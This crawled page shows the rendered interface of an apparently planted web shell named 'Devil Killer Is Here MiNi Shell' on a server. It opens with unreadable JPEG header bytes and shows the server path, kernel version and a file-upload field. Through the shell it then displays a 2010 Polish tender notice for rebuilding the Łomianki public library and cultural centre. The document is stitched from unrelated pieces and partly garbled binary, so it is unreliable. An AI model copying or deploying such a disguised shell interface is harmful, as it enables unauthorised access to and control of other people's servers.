JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100709/181877-N-2010.html

<p class="kh_header"><b>Łomianki: Rozbudowa, przebudowa i modernizacja Biblioteki Publicznej i Domu Kultury w Łomiankach.</b><br>
<b>Numer ogłoszenia: 181877 - 2010; data zamieszczenia: 09.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łomianki , ul. Warszawska 115, 05-092 Łomianki, woj. mazowieckie, tel. 0-22 7686302, faks 0-22 7686302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lomianki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa, przebudowa i modernizacja Biblioteki Publicznej i Domu Kultury w Łomiankach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach przedsięwzięcia inwestycyjnego należy wykonać :
1.	Kompleksową przebudowę, modernizację i rozbudowę budynku Domu Kultury, Biblioteki Publicznej oraz części użytkowanej przez OSP w Łomiankach.
2.	Szczegółowy sposób wykonania oraz zakres i rodzaj poszczególnych robót obejmujących przedmiot zamówienia został określony w Projekcie budowlano - wykonawczym oraz Specyfikacji Technicznej Wykonania i Odbioru Robót.
3.	Przedmiar robót należy traktować jedynie jako element pomocniczy do skalkulowania ceny ofertowej.
4.	Uzyskać prawomocne pozwolenie na użytkowanie budynku
W ramach zadania  należy wykonać:
Budowę nowego dwu kondygnacyjnego budynku, zlokalizowanego w płd-wsch części istniejącej zabudowy, w której znajduje się Dom Kultury, Biblioteka Publiczna. 
Budowę westybulu, stanowiącego główne wejście do budynku Domu Kultury, a zwłaszcza wejście do Sali Widowiskowej. 
Przebudowę i modernizację istniejącego budynku Domu Kultury i Biblioteki .
Kompleksową modernizację Sali Widowiskowej z nowym wyposażeniem 	scenicznym oświetleniem, nagłośnieniem, techniką multimedialną, 	multiplifikatornią. 
       Przebudowę i modernizację części budynku użytkowanej przez OSP w Łomiankach.	
Przebudowę istniejącego zagospodarowania terenu obejmującą budowę miejsc 	parkingowych oraz utworzenie przestrzeni na wolnym powietrzu. 
Wykonawca w ramach otrzymanego zlecenia zobowiązany  jest do:
a)	Wykonania robót budowlanych zgodnie z obowiązującymi przepisami, w szczególności wymogami Prawa Budowlanego. Roboty muszą być wykonane zgodnie z zasadami wiedzy technicznej, należytą starannością w ich wykonaniu dobrą jakością, właściwą organizacją pracy oraz zachowaniem wymagań i obowiązujących przepisów w szczególności bhp, p.poż. i branżowych.
b)	Zastosowania materiałów oraz urządzeń posiadających aktualne dokumenty dopuszczające do stosowania w budownictwie, zgodnie z przepisami obowiązującymi w tym zakresie.
c)	Wykonawca robót ponosi odpowiedzialność za jakość wykonywanych robót oraz zastosowanych materiałów.
d)	Wykonania innych wymaganych opracowań lub działań nie przewidzianych niniejszym zakresem, koniecznych do wykonania przedmiotu umowy.
e)	Należy zapewnić obsługę geodezyjną wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej.
f)	Przygotowania pełnej dokumentacji powykonawczej i odbiorowej budynku, uzyskanie decyzji pozwolenia na użytkowanie budynku. 
Wykonawca złoży ofertę na kompleksowe wykonanie ww. zadania na podstawie:
a)	Szczegółowego zapoznania się z dokumentacją techniczną sporządzoną przez Biuro Studiów i Projektów Budownictwa ARCHITEKTOR z siedzibą w Poznaniu,
b)	Przedmiaru robót budowlanych sporządzonych przez Biuro Studiów i Projektów Budownictwa  ARCHITEKTOR z siedzibą w Poznaniu,
Wymagany termin realizacji zamówienia:
	Etap I
	Budowa nowego dwukondygnacyjnego budynku, zaplecza Sali Widowiskowej, głównego wejścia do budynku Westybulu, w zakresie
a)	Prace przygotowawcze,
b)	Wykonanie stanu surowego zamkniętego,
c)	Prace wykończeniowe.
c)	Wyposażenie
Modernizacja części budynku użytkowanego przez OSP.
a) Remont dachów z wykonaniem ocieplenia, reperacja obróbek blacharskich, rynien i rur spustowych,
b)	Wykonanie automatycznych wrót do garażu,
c)	Wykonanie odwodnienia terenu pod garażami z wykonaniem studzienki chłonnej,
d)	Wykonanie pogłębienia jednego stanowiska w garażu i fragmentu wjazdu,
e)	Wymiana stolarki okiennej i drzwiowej.
f)	Wykonanie termoizolacji ścian zewnętrznych,
g)	Remont pomieszczeń,
h)	Remont instalacji wod-kan.
i)	Wymiana instalacji elektrycznej
Modernizacja starej części budynku Domu Kultury i Biblioteki Publicznej
a)	Modernizacja Sali Widowiskowej,
b)	Remont dachów z wykonaniem ocieplenia, wymiany zniszczonych elementów konstrukcyjnych, obróbek, rynien i rur spustowych,
c)	Wykonanie termoizolacji ścian zewnętrznych,
	Termin realizacji prac budowlanych do dnia 30.05.2011 r.
	Etap II	
Modernizacja starej części budynku Domu Kultury i Biblioteki Publicznej
a)	Remont instalacji wod- kan,
b)	Wymiana i remont instalacji remont instalacji elektrycznej,
c)	Wykonanie wentylacji mechanicznej i klimatyzacji,
d)	Remont instalacji centralnego ogrzewania,
e)	Remont pomieszczeń,
f)	Zagospodarowanie terenu, parkingi, dojścia, zieleń,
	Termin realizacji prac budowlanych
	Rozpoczęcie od dnia: 01.06.2011 r.
	Zakończenie do dnia 30.09.2011 r.
	Termin uzyskania prawomocnej decyzji pozwolenia na użytkowanie do dnia 30.11.2011 r.
Wynagrodzenie za wykonanie przedmiotu zamówienia:
Wykonawca przed zawarciem umowy zobowiązany jest przedłożyć kosztorys ofertowy, który będzie miał zastosowanie na etapie wykonania przedmiotu umowy w sytuacji przerwania realizacji zamówienia i wystąpienia okoliczności polegających np. na wypłaceniu wynagrodzenia z tytułu wykonania części przedmiotu zamówienia lub okoliczności wynagrodzenia za ewentualne zabezpieczenie przerwanych robót.
Wykonawca przedstawi Zamawiającemu przed podpisaniem umowy harmonogram rzeczowo-finansowy wykonania robót budowlanych, który będzie stanowił załącznik 	do umowy. Przedstawiony harmonogram będzie zawierał podział kosztów na:
Zakres I - Koszty kwalifikowane związane z uzyskaniem dofinansowania unijnego - w ramach ww. kosztów należy wykonać roboty związane z rozbudową, modernizacją i remontem, Budynku Domu Kultury i Biblioteki Publicznej wraz z wykonaniem zagospodarowania terenu.
Zakres II - Koszty niekwalifikowane - w ramach ww. kosztów należy wykonać roboty związane z modernizacją części budynku użytkowanej przez OSP.
Płatności za wykonane roboty budowlane będą realizowane zgodnie z zatwierdzonym 	przez Inwestora harmonogramem rzeczowo - finansowym.
W ramach ww. kosztów należy wykonać roboty związane z Rozbudowa, przebudową i modernizacją Biblioteki Publicznej i Domu Kultury w Łomiankach, określone w Etapie I  i II niniejszego opisu., przy czym należy uwzględnić pierwszą płatność: po bezusterkowym odbiorze prac budowlanych w terminie do dnia 30.09.2011 r. w wysokości 80 % wynagrodzenia brutto, oraz drugą płatność po uzyskaniu prawomocnej decyzji pozwolenia na użytkowanie do dnia 30.11.2011 r. w wysokości 20 % wynagrodzenia brutto.
Sposób rozliczania: fakturowanie częściowe, zgodnie z harmonogramem rzeczowo - finansowym na podstawie podpisanych przez obie strony bezusterkowych częściowych protokółów zdawczo - odbiorczych.
Faktury wystawione przez Wykonawcę za wykonanie przedmiotu zamówienia będą wystawiane osobno zgodnie z podziałem na koszty kwalifikowane i niekwalifikowane przedstawione w harmonogramie rzeczowo-finansowym.

Wykonawca zobowiązany jest: 

1.	Zastosować materiały oraz urządzenia posiadające aktualne dokumenty dopuszczające 	do stosowania w budownictwie ( aprobaty techniczne, certyfikaty, deklaracje 	zgodności), zgodnie z przepisami obowiązującymi w tym zakresie. Zamawiający 	dopuszcza możliwość zastosowania produktów równoważnych do podanych w 	przedmiarach robót pod warunkiem, że produkty te będą spełniały wszystkie 	obowiązujące normy i będą dopuszczone do obrotu na terenie Unii Europejskiej 	zgodnie z przepisami obowiązującymi w tym zakresie w szczególności:
Ustawą z dnia 16.04.2004 r. o wyrobach budowlanych (Dz.U. z 2004 r. nr 92, poz. 881)
Rozporządzeniem Ministra Infrastruktury z dnia 08.11.2004 r. w sprawie aprobat technicznych oraz jednostek organizacyjnych upoważnionych do ich wydawania (Dz.U. z 2004 r., nr 249, poz. 2497)
Rozporządzeniem Ministra Infrastruktury z dnia 08.11.2004 r. w sprawie sposobu deklarowania zgodności wyrobów budowlanych oraz sposobu znakowania ich znakiem budowlanym (Dz. U. z 2004 r., nr 198, poz. 2041)
2.	W przypadku zastosowania rozwiązań równoważnych Wykonawca ma obowiązek 	wykazać, że zastosowane materiały posiadają parametry takie same lub lepsze niż 	określone w przedmiarach, poprzez podanie w ofercie wykazu zastosowanych 	produktów równoważnych z podaniem ich nazwy i dokładnym opisem parametrów oraz 	załączyć kopie atestów, certyfikatów, aprobat technicznych lub deklaracji zgodności, jakie 	dany produkt posiada, zgodnych ze stosownymi przepisami. 
3.	Przed złożeniem oferty na realizację przedmiotu zamówienia zaleca się dokonać wizji 	lokalnej w miejscu planowanych robót, w celu zapoznania się z warunkami w terenie 	w celu uzyskania niezbędnych informacji dla poprawnego i kompletnego 	przygotowania oferty. 
4.	Wykonywania robót zgodnie z obowiązującymi przepisami, w szczególności wymogami Prawa Budowlanego (Dz.U. z 2006 r. nr 156, poz. 1118, z późn. zm.). Roboty muszą być wykonane zgodnie z zasadami wiedzy technicznej, należytą starannością w ich wykonaniu, dobrą jakością, właściwą organizacją pracy oraz zachowaniem wymagań i obowiązujących przepisów w szczególności bhp, ppoż i branżowych.
5.	Wykonawca robót ponosi odpowiedzialność za jakość wykonywanych robót oraz zastosowane materiały. 
Zamawiający zobowiązany jest do: 

1.	Wprowadzenia Wykonawcy na teren budowy w ciągu 7 dni od zgłoszenia rozpoczęcia robót do Powiatowego Inspektora Nadzoru Budowlanego.
2.	Dokonania odbioru robót w terminie 14 dni od daty otrzymania zgłoszenia przez wykonawcę gotowości do odbioru, przy czym za termin wykonania robót należy przyjąć: wykonanie robót objętych zakresem umownym wraz z przekazaniem dokumentacji powykonawczej.

Warunki gwarancji 

1.	Wykonawca jest odpowiedzialny względem Zamawiającego za wady zmniejszające 	wartość lub użyteczność wykonanego przedmiotu umowy ze względu na jego cel 	określony w umowie.
2.	Odpowiedzialność z tytułu rękojmi Wykonawca ponosi na zasadach określonych w 	Kodeksie
Cywilnym.
3.	Zamawiający może wykonać uprawnienia z tytułu rękojmi po upływie jej terminu, jeżeli 	reklamował wadę przed upływem tego terminu.
4.	Wykonawca udzieli Zamawiającemu 36-cio miesięcznej gwarancji od daty odbioru 	końcowego na wykonane prace budowlano - montażowe oraz instalacje i urządzenia 	budowlane.
5.	Zamawiający zachowa uprawnienia z tytułu rękojmi w przypadku ujawnienia się wad 	ukrytych przedmiotu zamówienia, których wykrycie nie było możliwe podczas 	protokólarnego dokonywania odbioru budynku.
6.	Gwarancja na wszystkie zamontowane urządzenia techniczne zostaje udzielona w formie 	pisemnej na okres 36 miesięcy od daty odbioru końcowego lub dłuższy, o ile producent 	lub sprzedawca udzieli takiej gwarancji.
7.	O wykryciu wady, Zamawiający zobowiązany jest zawiadomić Wykonawcę na piśmie w 	terminie 10 dni roboczych od daty jej ujawnienia.
8.	Istnienie wady powinno być stwierdzone protokolarnie. O dacie i miejscu oględzin 	mających na celu jej stwierdzenie, Zamawiający zawiadomi Wykonawcę na piśmie na 5 	dni roboczych przed dokonaniem oględzin, chyba że Strony umówią się inaczej. Podczas 	dokonywania oględzin Zamawiający wyznaczy termin na usunięcie wad.
9.	Usunięcie wad będzie każdorazowo stwierdzone protokołem podpisanym przez 	Zamawiającego. 
10.	Wykonawca nie może odmówić usunięcia wad bez względu na wysokość związanych z 		tym kosztów.
11.	Ujawnienie wad i usterek w okresie gwarancji lub rękojmi obliguje Wykonawcę do ich 	usunięcia na własny koszt, w terminie technicznie uzasadnionym, wskazanym przez 	Zamawiającego. Okres gwarancji zostaje przedłużony na ten zakres o czas od ujawnienia 	wady lub usterki do chwili ich usunięcia.
12.	Wykonawca zobowiązuje się do zaspokojenia wszelkich roszczeń Zamawiającego 	zgłoszonych w ramach rękojmi lub gwarancji na zasadach określonych niniejszą umową, 	kartą gwarancyjną oraz przepisami kodeksu cywilnego.
13.	W okresie rękojmi i gwarancji Wykonawca zobowiązany jest do pisemnego 	zawiadomienia Zamawiającego w terminie 7 dni o:
1) zmianie siedziby lub nazwy firmy Wykonawcy,
2) zmianie osób reprezentujących Wykonawcę,
3) ogłoszeniu upadłości Wykonawcy,
4) wszczęciu postępowania układowego, w którym uczestniczy Wykonawca,
5) likwidacji firmy Wykonawcy.
Termin realizacji zamówienia 

1.	rozpoczęcie robót nie później niż 13 września 2010 r.
2.	wykonanie robót budowlanych nie później niż do dnia 30 września 2011 r.
3.	uzyskanie prawomocnej decyzji pozwolenia na użytkowanie do dnia 30 listopada 	2011 r.
Termin płatności wynagrodzenia

14 dni od daty złożenia prawidłowo wystawionej faktury VAT wystawionej na podstawie bezusterkowego protokołu odbioru robót, lub doręczenia Zamawiającemu prawomocnej decyzji pozwolenia na użytkowanie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiot zamówień uzupełniających polega na powtórzeniu tego samego rodzaju zamówień. Zakres jest zgodny z przedmiotem zamówienia podstawowego i stanowi 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1, 45.21.23.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 14 000,00 PLN (słownie: czternaście tysięcy  złotych).

Wadium wnosi się przed upływem terminu  składania ofert.

Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych
w art. 22 ust.1ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę że wykonał zgodnie z zasadami  sztuki budowlanej minimum
1 robotę budowlaną polegającą na wykonaniu budynku użyteczności publicznej  pełniącego funkcje edukacyjną lub kulturalną tj.. dom kultury lub sala widowiskowa lub kinowa o wartości wykonanej roboty  minimum 3 300 000,00 zł brutto w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych
w art. 22 ust.1ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcą że dysponuje  osobami  posiadającymi  nw. uprawniania:
budowlane w specjalności konstrukcyjno- budowlanej- 1 osoba,
budowlane  w specjalności  instalacyjnej  w zakresie  sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych  i  kanalizacyjnych- 1 osoba,
budowlane w specjalności  instalacyjnej w zakresie sieci, instalacji  i urządzeń elektrycznych  i elektroenergetycznych- 1 osoba;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych
w art. 22 ust.1ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Prawo Zamówień Publicznych Zamawiający przewiduje możliwość dokonania zmian w umowie w formie aneksu w szczególności:
1)	 w przypadku uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego, 
2)	z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością,
w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
